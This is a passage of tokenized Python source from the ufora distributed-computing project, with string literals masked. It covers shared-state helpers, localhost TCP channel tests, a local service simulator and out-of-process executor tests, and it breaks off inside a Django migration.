. submitComputation ( "<STR_LIT>" ) <EOL> simulation . waitForAnyResult ( ) <EOL> simulation . addWorker ( ) <EOL> self . assertTrue ( simulation . waitForHandshake ( ) ) <EOL> finally : <EOL> simulation . teardown ( ) </s>
<s> import logging <EOL> import time <EOL> import threading <EOL> import ufora . native . SharedState as SharedStateNative <EOL> import ufora . native . Json as NativeJson <EOL> MessageOut = getattr ( SharedStateNative , '<STR_LIT>' ) <EOL> MessageIn = getattr ( SharedStateNative , '<STR_LIT>' ) <EOL> LogEntry = getattr ( SharedStateNative , '<STR_LIT>' ) <EOL> InMemoryChannel = SharedStateNative . InMemoryChannel <EOL> KeyRange = SharedStateNative . makeKeyRange <EOL> KeyRangeSet = SharedStateNative . KeyRangeSet <EOL> Key = SharedStateNative . Key <EOL> Keyspace = SharedStateNative . Keyspace <EOL> getClientInfoKeyspace = SharedStateNative . getClientInfoKeyspace <EOL> trxTime = <NUM_LIT:0> <EOL> def Listener ( view ) : <EOL> """<STR_LIT>""" <EOL> listener = SharedStateNative . Listener ( ) <EOL> listener . listenToView ( view ) <EOL> return listener <EOL> class Transaction ( object ) : <EOL> def __init__ ( self , v ) : <EOL> assert v . connected , "<STR_LIT>" <EOL> self . v = v <EOL> def __enter__ ( self ) : <EOL> self . v . begin ( ) <EOL> self . t = time . time ( ) <EOL> def __exit__ ( self , * args ) : <EOL> global trxTime <EOL> if args [ <NUM_LIT:0> ] is None and self . v . connected : <EOL> self . v . end ( ) <EOL> else : <EOL> self . v . abort ( ) <EOL> trxTime += time . time ( ) - self . t <EOL> def iterKeys ( view , keyspace ) : <EOL> assert view . isFrozen <EOL> key = view . nextKey ( Key ( keyspace , tuple ( NativeJson . lowestValue ( ) for x in range ( keyspace . dimension ) ) ) ) <EOL> while key is not None : <EOL> yield key <EOL> key = view . nextKey ( key ) <EOL> def iterItems ( view , keyspace ) : <EOL> for key in iterKeys ( view , keyspace ) : <EOL> yield key , view [ key ] <EOL> def subscribeToClientInfoKeyspace ( view ) : <EOL> introspectionKeyspace = getClientInfoKeyspace ( ) <EOL> keyrange = KeyRange ( introspectionKeyspace , <NUM_LIT:1> , None , None , True , False ) <EOL> view . subscribe ( keyrange ) <EOL> def connectedClientInfo ( view ) : <EOL> """<STR_LIT>""" <EOL> clientInfoKeyspace = SharedStateNative . getClientInfoKeyspace ( ) <EOL> k = view . nextKey ( Key ( clientInfoKeyspace , ( NativeJson . lowestValue ( ) , NativeJson . lowestValue ( ) ) ) ) <EOL> maxId = <NUM_LIT:0> <EOL> tr = set ( ) <EOL> while k is not None : <EOL> if k . keyspace != clientInfoKeyspace . name : <EOL> return tr , maxId <EOL> if view [ k ] . value ( ) != NativeJson . Json ( '<STR_LIT>' ) : <EOL> tr . add ( k [ <NUM_LIT:1> ] ) <EOL> maxId = max ( maxId , view [ k ] . id ( ) ) <EOL> k = view . nextKey ( k ) <EOL> return tr , maxId <EOL> def connectedClientIDs ( view ) : <EOL> tr = connectedClientInfo ( view ) <EOL> return tr [ <NUM_LIT:0> ] </s>
<s> import unittest <EOL> import threading <EOL> import ufora . config . Setup as Setup <EOL> import ufora . networking . ChannelListener as ChannelListener <EOL> import ufora . util . ManagedThread as ManagedThread <EOL> import ufora . distributed . SharedState . Connections . TcpChannelFactory as TcpChannelFactory <EOL> import ufora . native . CallbackScheduler as CallbackScheduler <EOL> callbackScheduler = CallbackScheduler . singletonForTesting ( ) <EOL> class ChannelEchoServer ( ChannelListener . ChannelListener ) : <EOL> def __init__ ( self , port , echoMultiplier = <NUM_LIT:1> , sizeMultiplier = <NUM_LIT:1> ) : <EOL> super ( ChannelEchoServer , self ) . __init__ ( callbackScheduler , port ) <EOL> self . _echoMultiplier = echoMultiplier <EOL> self . _sizeMultiplier = sizeMultiplier <EOL> self . channels = [ ] <EOL> self . threads = [ ] <EOL> self . _stopFlag = threading . Event ( ) <EOL> self . channelConnectCallback = self . _channelConnectCallback <EOL> def _channelConnectCallback ( self , channel ) : <EOL> channel = channel . makeQueuelike ( callbackScheduler ) <EOL> t = ManagedThread . ManagedThread ( target = self . _echoLoop , args = ( channel , ) ) <EOL> t . start ( ) <EOL> self . threads . append ( t ) <EOL> self . channels . append ( t ) <EOL> def teardown ( self ) : <EOL> super ( ChannelEchoServer , self ) . stop ( ) <EOL> self . _stopFlag . set ( ) <EOL> for t in self . threads : <EOL> t . join ( ) <EOL> def _echoLoop ( self , channel ) : <EOL> while not self . _stopFlag . is_set ( ) : <EOL> try : <EOL> toEcho = channel . get ( ) <EOL> except UserWarning : <EOL> return <EOL> try : <EOL> if self . _sizeMultiplier > <NUM_LIT:1> : <EOL> toEcho = toEcho * self . _sizeMultiplier <EOL> for i in range ( self . _echoMultiplier ) : <EOL> channel . write ( toEcho ) <EOL> except UserWarning : <EOL> return <EOL> class ChannelFactoryTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . port = Setup . config ( ) . testPort <EOL> def test_socket_listener ( self ) : <EOL> server = ChannelEchoServer ( self . port ) <EOL> try : <EOL> thread = ManagedThread . ManagedThread ( target = server . start ) <EOL> thread . start ( ) <EOL> server . blockUntilReady ( ) <EOL> stringChannelFactory = TcpChannelFactory . TcpStringChannelFactory ( callbackScheduler ) <EOL> channel = stringChannelFactory . createChannel ( <EOL> ( '<STR_LIT:localhost>' , self . port ) <EOL> ) <EOL> channel = channel . makeQueuelike ( callbackScheduler ) <EOL> toSend = "<STR_LIT>" <EOL> channel . write ( toSend ) <EOL> self . assertEquals ( toSend , channel . get ( ) ) <EOL> finally : <EOL> try : <EOL> server . teardown ( ) <EOL> except UserWarning : <EOL> pass <EOL> thread . join ( ) <EOL> def test_socket_channel_shutdown ( self ) : <EOL> done = threading . Event ( ) <EOL> listener = ChannelListener . SocketListener ( self . port ) <EOL> listener . registerConnectCallback ( lambda sock , address : done . set ( ) ) <EOL> try : <EOL> thread = ManagedThread . ManagedThread ( target = listener . start ) <EOL> thread . start ( ) <EOL> listener . blockUntilReady ( ) <EOL> TcpChannelFactory . TcpStringChannelFactory ( callbackScheduler ) . createChannel ( ( '<STR_LIT:localhost>' , self . port ) ) <EOL> self . assertTrue ( done . wait ( <NUM_LIT:2> ) ) <EOL> finally : <EOL> listener . stop ( ) <EOL> thread . join ( ) </s>
<s> import time <EOL> import logging <EOL> import os <EOL> import ufora . core . SubprocessRunner as SubprocessRunner <EOL> import traceback <EOL> import threading <EOL> import sys <EOL> import uuid <EOL> import ufora . util . KillProcessHoldingPort as KillProcessHoldingPort <EOL> import ufora . config . Setup as Setup <EOL> import ufora . util . DirectoryScope as DirectoryScope <EOL> import ufora . cumulus . distributed . CumulusGatewayRemote as CumulusGatewayRemote <EOL> import ufora . cumulus . distributed . CumulusActiveMachines as CumulusActiveMachines <EOL> import ufora . distributed . SharedState . Connections . TcpChannelFactory as TcpChannelFactory <EOL> import ufora . distributed . SharedState . Connections . ViewFactory as ViewFactory <EOL> import ufora . FORA . VectorDataManager . VectorDataManager as VectorDataManager <EOL> import ufora . util . OutOfProcessDownloader as OutOfProcessDownloader <EOL> import ufora . util . CodeCoverage as CodeCoverage <EOL> import ufora . native . CallbackScheduler as CallbackScheduler <EOL> WAIT_FOR_RELAY_TERMINATION_TIMEOUT_SECONDS = CodeCoverage . adjusted_timeout ( <NUM_LIT> ) <EOL> WAIT_FOR_SERVICE_TERMINATION_TIMEOUT_SECONDS = CodeCoverage . adjusted_timeout ( <NUM_LIT> ) <EOL> STOP_MESSAGE = "<STR_LIT>" <EOL> def simulationDirName ( ) : <EOL> return os . path . join ( Setup . config ( ) . fakeAwsBaseDir , time . strftime ( '<STR_LIT>' ) ) <EOL> def makeUniqueDir ( ) : <EOL> newDirName = simulationDirName ( ) <EOL> i = <NUM_LIT:0> <EOL> while os . path . exists ( newDirName ) : <EOL> newDirName = simulationDirName ( ) + ( '<STR_LIT>' % i ) <EOL> i += <NUM_LIT:1> <EOL> logging . info ( '<STR_LIT>' , newDirName ) <EOL> os . makedirs ( newDirName ) <EOL> return newDirName <EOL> class WorkerProcesses ( object ) : <EOL> def __init__ ( self , worker_path ) : <EOL> self . worker_path = worker_path <EOL> self . desired = <NUM_LIT:0> <EOL> self . num_ever_started = <NUM_LIT:0> <EOL> self . processes = { } <EOL> self . threads = { } <EOL> def desireNumberOfWorkers ( self , count , blocking = False ) : <EOL> logging . info ( '<STR_LIT>' , count ) <EOL> self . desired = count <EOL> delta = count - len ( self . threads ) <EOL> if delta > <NUM_LIT:0> : <EOL> self . _addWorkers ( delta ) <EOL> elif delta < <NUM_LIT:0> : <EOL> self . _removeWorkers ( - delta ) <EOL> def startService ( self ) : <EOL> pass <EOL> def stopService ( self ) : <EOL> self . _removeWorkers ( len ( self . threads ) ) <EOL> def _addWorkers ( self , count ) : <EOL> for _ in range ( count ) : <EOL> self . _addWorker ( ) <EOL> def _removeWorkers ( self , count ) : <EOL> while count > <NUM_LIT:0> : <EOL> worker_id , proc = self . processes . iteritems ( ) . next ( ) <EOL> thread = self . threads [ worker_id ] <EOL> del self . processes [ worker_id ] <EOL> del self . threads [ worker_id ] <EOL> proc . stop ( ) <EOL> thread . join ( ) <EOL> count -= <NUM_LIT:1> <EOL> def _addWorker ( self ) : <EOL> worker_id = uuid . uuid4 ( ) <EOL> thread = threading . Thread ( target = self . _runWorker , <EOL> args = ( worker_id , Setup . config ( ) . fakeAwsBaseDir ) ) <EOL> self . threads [ worker_id ] = thread <EOL> thread . start ( ) <EOL> @ staticmethod <EOL> def _workerLogFile ( worker_id , iteration , logDir ) : <EOL> return os . path . join ( logDir , <EOL> "<STR_LIT>" % ( worker_id , iteration ) ) <EOL> def _runWorker ( self , worker_id , logDir ) : <EOL> iteration = <NUM_LIT:0> <EOL> while worker_id in self . threads : <EOL> iteration += <NUM_LIT:1> <EOL> log_path = self . _workerLogFile ( worker_id , iteration , logDir ) <EOL> logging . info ( "<STR_LIT>" , self . worker_path , log_path ) <EOL> with open ( log_path , '<STR_LIT:a>' ) as logfile : <EOL> def writeline ( msg ) : <EOL> logfile . write ( msg + '<STR_LIT:\n>' ) <EOL> env = dict ( os . environ ) <EOL> env [ '<STR_LIT>' ] = str ( <NUM_LIT> + <NUM_LIT:2> * self . num_ever_started ) <EOL> self . num_ever_started += <NUM_LIT:1> <EOL> proc = SubprocessRunner . SubprocessRunner ( <EOL> [ sys . executable , '<STR_LIT>' , self . worker_path ] , <EOL> writeline , <EOL> writeline , <EOL> env = env <EOL> ) <EOL> logfile . write ( "<STR_LIT>" ) <EOL> logging . info ( "<STR_LIT>" , worker_id ) <EOL> logfile . flush ( ) <EOL> proc . start ( ) <EOL> self . processes [ worker_id ] = proc <EOL> proc . wait ( ) <EOL> logging . info ( "<STR_LIT>" , worker_id ) <EOL> class RunForeverCommand : <EOL> def __init__ ( self , foreverCommand , script , environ , timeout ) : <EOL> self . foreverCommand = foreverCommand <EOL> self . script = script <EOL> self . environ = environ <EOL> self . timeout = timeout <EOL> def __call__ ( self ) : <EOL> args = [ '<STR_LIT>' , self . foreverCommand , self . script ] <EOL> response = [ ] <EOL> def foreverStdOut ( msg ) : <EOL> response . append ( "<STR_LIT>" % ( self . script , msg ) ) <EOL> def foreverStdErr ( msg ) : <EOL> response . append ( "<STR_LIT>" % ( self . script , msg ) ) <EOL> subprocess = SubprocessRunner . SubprocessRunner ( args , <EOL> foreverStdOut , <EOL> foreverStdErr , <EOL> self . environ ) <EOL> subprocess . start ( ) <EOL> subprocess . wait ( self . timeout ) <EOL> subprocess . stop ( ) <EOL> return "<STR_LIT:\n>" . join ( response ) <EOL> class Simulator ( object ) : <EOL> _globalSimulator = None <EOL> _originalFakeAwsDir = None <EOL> def __init__ ( self ) : <EOL> callbackSchedulerFactory = CallbackScheduler . createSimpleCallbackSchedulerFactory ( ) <EOL> self . callbackScheduler = callbackSchedulerFactory . createScheduler ( "<STR_LIT>" , <NUM_LIT:1> ) <EOL> self . uforaPath = os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) <EOL> self . sharedStatePath = os . path . join ( self . uforaPath , '<STR_LIT>' ) <EOL> self . sharedStateMainline = os . path . join ( self . sharedStatePath , '<STR_LIT>' ) <EOL> self . gatewayServiceMainline = os . path . join ( self . uforaPath , '<STR_LIT>' ) <EOL> self . webPath = os . path . join ( self . uforaPath , '<STR_LIT>' ) <EOL> self . relayScript = os . path . join ( self . webPath , '<STR_LIT>' ) <EOL> self . relayPort = Setup . config ( ) . relayPort <EOL> self . relayHttpsPort = Setup . config ( ) . relayHttpsPort <EOL> self . sharedStatePort = Setup . config ( ) . sharedStatePort <EOL> self . restApiPort = Setup . config ( ) . restApiPort <EOL> self . subscribableWebObjectsPort = Setup . config ( ) . subscribableWebObjectsPort <EOL> self . processPool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> ) <EOL> self . desirePublisher = None <EOL> self . _connectionManager = None <EOL> def dumpRelayLogs ( self ) : <EOL> try : <EOL> logging . info ( "<STR_LIT>" , self . relayLogFile ) <EOL> with open ( self . relayLogFile , "<STR_LIT:r>" ) as f : <EOL> data = "<STR_LIT>" . join ( f . read ( ) . split ( "<STR_LIT:\n>" ) ) <EOL> logging . error ( "<STR_LIT>" , data ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" , traceback . format_exc ( ) ) <EOL> @ property <EOL> def relayLogFile ( self ) : <EOL> return os . path . join ( Setup . config ( ) . fakeAwsBaseDir , '<STR_LIT>' ) <EOL> @ property <EOL> def sharedStateLogFile ( self ) : <EOL> return os . path . join ( Setup . config ( ) . fakeAwsBaseDir , '<STR_LIT>' ) <EOL> @ property <EOL> def gatewayLogFile ( self ) : <EOL> return os . path . join ( Setup . config ( ) . fakeAwsBaseDir , '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def getGlobalSimulator ( ) : <EOL> assert Simulator . _globalSimulator is not None , '<STR_LIT>' <EOL> return Simulator . _globalSimulator <EOL> @ staticmethod <EOL> def createGlobalSimulator ( useUniqueFakeAwsDir = True ) : <EOL> os . setpgid ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> if not os . path . exists ( Setup . config ( ) . fakeAwsBaseDir ) : <EOL> os . makedirs ( Setup . config ( ) . fakeAwsBaseDir ) <EOL> Simulator . _originalFakeAwsDir = Setup . config ( ) . fakeAwsBaseDir <EOL> if useUniqueFakeAwsDir : <EOL> newDirName = makeUniqueDir ( ) <EOL> fakeAwsBase = Setup . config ( ) . fakeAwsBaseDir <EOL> Setup . config ( ) . fakeAwsBaseDir = newDirName <EOL> latestLinkPath = os . path . join ( fakeAwsBase , '<STR_LIT>' ) <EOL> if os . path . exists ( latestLinkPath ) : <EOL> os . unlink ( latestLinkPath ) <EOL> os . symlink ( newDirName , latestLinkPath ) <EOL> assert Simulator . _globalSimulator is None <EOL> Simulator . _globalSimulator = Simulator ( ) <EOL> return Simulator . _globalSimulator <EOL> def createCumulusGateway ( self , callbackScheduler , vdm = None ) : <EOL> if vdm is None : <EOL> vdm = VectorDataManager . constructVDM ( callbackScheduler ) <EOL> vdm . setDropUnreferencedPagesWhenFull ( True ) <EOL> viewFactory = self . getViewFactory ( ) <EOL> return CumulusGatewayRemote . RemoteGateway ( <EOL> self . callbackScheduler , <EOL> vdm , <EOL> TcpChannelFactory . TcpStringChannelFactory ( self . callbackScheduler ) , <EOL> CumulusActiveMachines . CumulusActiveMachines ( viewFactory ) , <EOL> viewFactory <EOL> ) <EOL> def verifySharedStateRunning ( self , timeout = <NUM_LIT> ) : <EOL> t0 = time . time ( ) <EOL> while True : <EOL> try : <EOL> self . getViewFactory ( ) . createView ( ) <EOL> return <EOL> except : <EOL> if time . time ( ) - t0 >= timeout : <EOL> traceback . print_exc ( ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> def getViewFactory ( self ) : <EOL> return ViewFactory . ViewFactory . TcpViewFactory ( self . callbackScheduler , <EOL> '<STR_LIT:localhost>' , <EOL> self . sharedStatePort ) <EOL> def startService ( self ) : <EOL> self . stopRelay ( ) <EOL> self . stopGatewayService ( ) <EOL> self . stopSharedState ( ) <EOL> KillProcessHoldingPort . killProcessGroupHoldingPorts ( <EOL> Setup . config ( ) . basePort , <EOL> Setup . config ( ) . basePort + Setup . config ( ) . numPorts <EOL> ) <EOL> self . createSimulationDirectory ( ) <EOL> self . startSharedState ( ) <EOL> try : <EOL> self . startGatewayService ( ) <EOL> logging . info ( '<STR_LIT>' ) <EOL> with DirectoryScope . DirectoryScope ( self . webPath ) : <EOL> self . startRelayProcess ( self . relayScript ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . verifySharedStateRunning ( ) <EOL> self . desirePublisher = WorkerProcesses ( <EOL> os . path . join ( self . uforaPath , '<STR_LIT>' ) <EOL> ) <EOL> except : <EOL> logging . error ( <EOL> "<STR_LIT>" , <EOL> traceback . format_exc ( ) <EOL> ) <EOL> self . dumpRelayLogs ( ) <EOL> raise <EOL> def startSharedState ( self ) : <EOL> cacheDir = Setup . config ( ) . getConfigValue ( <EOL> "<STR_LIT>" , <EOL> os . path . join ( Setup . config ( ) . fakeAwsBaseDir , '<STR_LIT>' ) <EOL> ) <EOL> logging . info ( "<STR_LIT>" , <EOL> cacheDir , <EOL> self . sharedStateLogFile ) <EOL> with DirectoryScope . DirectoryScope ( self . sharedStatePath ) : <EOL> args = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , self . sharedStateLogFile , <EOL> '<STR_LIT:start>' , <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , self . sharedStateMainline , <EOL> '<STR_LIT>' , cacheDir , <EOL> '<STR_LIT>' , '<STR_LIT:info>' <EOL> ] <EOL> def sharedStateStdout ( msg ) : <EOL> logging . info ( "<STR_LIT>" , msg ) <EOL> def sharedStateStderr ( msg ) : <EOL> logging . info ( "<STR_LIT>" , msg ) <EOL> startSharedState = SubprocessRunner . SubprocessRunner ( <EOL> args , <EOL> sharedStateStdout , <EOL> sharedStateStderr , <EOL> dict ( os . environ ) <EOL> ) <EOL> startSharedState . start ( ) <EOL> startSharedState . wait ( <NUM_LIT> ) <EOL> startSharedState . stop ( ) <EOL> def stopSharedState ( self ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . stopForeverProcess ( self . sharedStateMainline ) <EOL> def restartSharedState ( self ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . restartForeverProcess ( self . sharedStateMainline ) <EOL> def startGatewayService ( self ) : <EOL> args = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , self . gatewayLogFile , <EOL> '<STR_LIT:start>' , <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , self . gatewayServiceMainline , <EOL> '<STR_LIT>' , '<STR_LIT:test>' ] <EOL> def gatewayStdout ( msg ) : <EOL> logging . info ( "<STR_LIT>" , msg ) <EOL> def gatewayStderr ( msg ) : <EOL> logging . info ( "<STR_LIT>" , msg ) <EOL> gatewayProc = SubprocessRunner . SubprocessRunner ( <EOL> args , <EOL> gatewayStdout , <EOL> gatewayStderr , <EOL> dict ( os . environ ) <EOL> ) <EOL> gatewayProc . start ( ) <EOL> gatewayProc . wait ( <NUM_LIT> ) <EOL> gatewayProc . stop ( ) <EOL> def stopGatewayService ( self ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . stopForeverProcess ( self . gatewayServiceMainline ) <EOL> def stopRelay ( self ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . stopForeverProcess ( self . relayScript ) <EOL> def runForeverCommand ( self , script , foreverCommand , timeout = <NUM_LIT> ) : <EOL> result = [ ] <EOL> self . processPool . getDownloader ( ) . executeAndCallbackWithString ( <EOL> RunForeverCommand ( foreverCommand , script , dict ( os . environ ) , timeout ) , <EOL> result . append <EOL> ) <EOL> for line in result [ <NUM_LIT:0> ] . split ( "<STR_LIT:\n>" ) : <EOL> logging . info ( line ) <EOL> def stopForeverProcess ( self , script , timeout = <NUM_LIT> ) : <EOL> self . runForeverCommand ( script , '<STR_LIT>' , timeout ) <EOL> def restartForeverProcess ( self , script , timeout = <NUM_LIT> ) : <EOL> self . runForeverCommand ( script , '<STR_LIT>' , timeout ) <EOL> def startRelayProcess ( self , relayScript ) : <EOL> tries = <NUM_LIT:0> <EOL> while tries < <NUM_LIT:5> : <EOL> hasStartedEvent = self . tryToStartRelayProcess ( relayScript ) <EOL> hasStartedEvent . wait ( <NUM_LIT> ) <EOL> if hasStartedEvent . isSet ( ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> return <EOL> logging . warn ( "<STR_LIT>" ) <EOL> tries = tries + <NUM_LIT:1> <EOL> self . stopRelay ( ) <EOL> assert False , "<STR_LIT>" <EOL> def tryToStartRelayProcess ( self , relayScript ) : <EOL> env = dict ( os . environ ) <EOL> env [ '<STR_LIT>' ] = '<STR_LIT:test>' <EOL> hasStartedEvent = threading . Event ( ) <EOL> def onStdOut ( msg ) : <EOL> hasStartedEvent . set ( ) <EOL> logging . critical ( "<STR_LIT>" , msg ) <EOL> def onStdErr ( msg ) : <EOL> logging . critical ( "<STR_LIT>" , msg ) <EOL> coffeeCommand = '<STR_LIT>' <EOL> if '<STR_LIT>' in os . environ : <EOL> coffeeCommand = '<STR_LIT>' <EOL> nodejsOptions = [ ] <EOL> if '<STR_LIT>' in os . environ : <EOL> nodejsOptions = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> args = [ relayScript , <EOL> '<STR_LIT>' , str ( self . relayPort ) , <EOL> '<STR_LIT>' , str ( self . subscribableWebObjectsPort ) ] <EOL> command = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , self . relayLogFile , <EOL> '<STR_LIT>' , self . webPath , <EOL> '<STR_LIT:start>' , <EOL> '<STR_LIT:-c>' , coffeeCommand ] + nodejsOptions + args <EOL> SubprocessRunner . SubprocessRunner ( command , onStdOut , onStdErr , env ) . start ( ) <EOL> return hasStartedEvent <EOL> def getDesirePublisher ( self ) : <EOL> assert self . desirePublisher , "<STR_LIT>" <EOL> return self . desirePublisher <EOL> @ staticmethod <EOL> def createSimulationDirectory ( ) : <EOL> if not os . path . exists ( Setup . config ( ) . fakeAwsBaseDir ) : <EOL> os . makedirs ( Setup . config ( ) . fakeAwsBaseDir ) <EOL> def stopService ( self ) : <EOL> self . stopGatewayService ( ) <EOL> self . stopSharedState ( ) <EOL> if self . desirePublisher : <EOL> self . desirePublisher . stopService ( ) <EOL> if self . _connectionManager : <EOL> self . _connectionManager . close ( ) <EOL> assert Simulator . _globalSimulator is not None <EOL> logging . info ( '<STR_LIT>' ) <EOL> self . stopRelay ( ) <EOL> Simulator . _globalSimulator = None <EOL> Setup . config ( ) . fakeAwsBaseDir = Simulator . _originalFakeAwsDir <EOL> self . processPool . teardown ( ) </s>
<s> import unittest <EOL> import ufora . util . OutOfProcessDownloader as OutOfProcessDownloader <EOL> import ufora . config . Mainline as Mainline <EOL> import ufora . distributed . util . common as common <EOL> import Queue <EOL> import time <EOL> import logging <EOL> import os <EOL> def returnsAString ( ) : <EOL> return "<STR_LIT>" <EOL> def assertsFalse ( ) : <EOL> assert False <EOL> def echoInput ( toEcho ) : <EOL> return toEcho <EOL> class DoublesString : <EOL> def __init__ ( self , x ) : <EOL> self . x = x <EOL> def __call__ ( self ) : <EOL> return self . x + self . x <EOL> class OutOfProcessDownloaderTestCases : <EOL> def test_basic ( self ) : <EOL> pool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> ) <EOL> pool . teardown ( ) <EOL> def test_in_process ( self ) : <EOL> pool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> , actuallyRunOutOfProcess = False ) <EOL> queue = Queue . Queue ( ) <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( returnsAString , queue . put ) <EOL> self . assertEqual ( queue . get ( ) , "<STR_LIT>" ) <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( DoublesString ( "<STR_LIT>" ) , queue . put ) <EOL> self . assertEqual ( queue . get ( ) , "<STR_LIT>" ) <EOL> pool . teardown ( ) <EOL> def test_execute ( self ) : <EOL> pool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> ) <EOL> queue = Queue . Queue ( ) <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( returnsAString , queue . put ) <EOL> self . assertEqual ( queue . get ( ) , "<STR_LIT>" ) <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( DoublesString ( "<STR_LIT>" ) , queue . put ) <EOL> self . assertEqual ( queue . get ( ) , "<STR_LIT>" ) <EOL> pool . teardown ( ) <EOL> def test_throughput ( self ) : <EOL> pool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> ) <EOL> queue = Queue . Queue ( ) <EOL> t0 = time . time ( ) <EOL> ix = <NUM_LIT:0> <EOL> while time . time ( ) - t0 < <NUM_LIT> : <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( DoublesString ( str ( ix ) ) , queue . put ) <EOL> self . assertEqual ( queue . get ( ) , str ( ix ) * <NUM_LIT:2> ) <EOL> ix = ix + <NUM_LIT:1> <EOL> logging . info ( "<STR_LIT>" , ix / <NUM_LIT> ) <EOL> self . assertTrue ( ix > <NUM_LIT:100> ) <EOL> pool . teardown ( ) <EOL> def test_exception ( self ) : <EOL> pool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> ) <EOL> queue = Queue . Queue ( ) <EOL> with self . assertRaises ( AssertionError ) : <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( assertsFalse , queue . put ) <EOL> pool . teardown ( ) <EOL> def test_callable_with_input ( self ) : <EOL> self . verifyCallableWithInput ( ) <EOL> def test_callable_with_input_in_proc ( self ) : <EOL> self . verifyCallableWithInput ( actuallyRunOutOfProcess = False ) <EOL> def verifyCallableWithInput ( self , actuallyRunOutOfProcess = True ) : <EOL> pool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> , actuallyRunOutOfProcess ) <EOL> try : <EOL> queue = Queue . Queue ( ) <EOL> toEcho = "<STR_LIT:x>" * <NUM_LIT> <EOL> def writeInput ( fd ) : <EOL> os . write ( fd , common . prependSize ( toEcho ) ) <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( echoInput , queue . put , writeInput ) <EOL> self . assertEqual ( queue . get ( ) , toEcho ) <EOL> finally : <EOL> pool . teardown ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT:email>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( blank = True , max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( blank = True , choices = [ ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT:id>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , 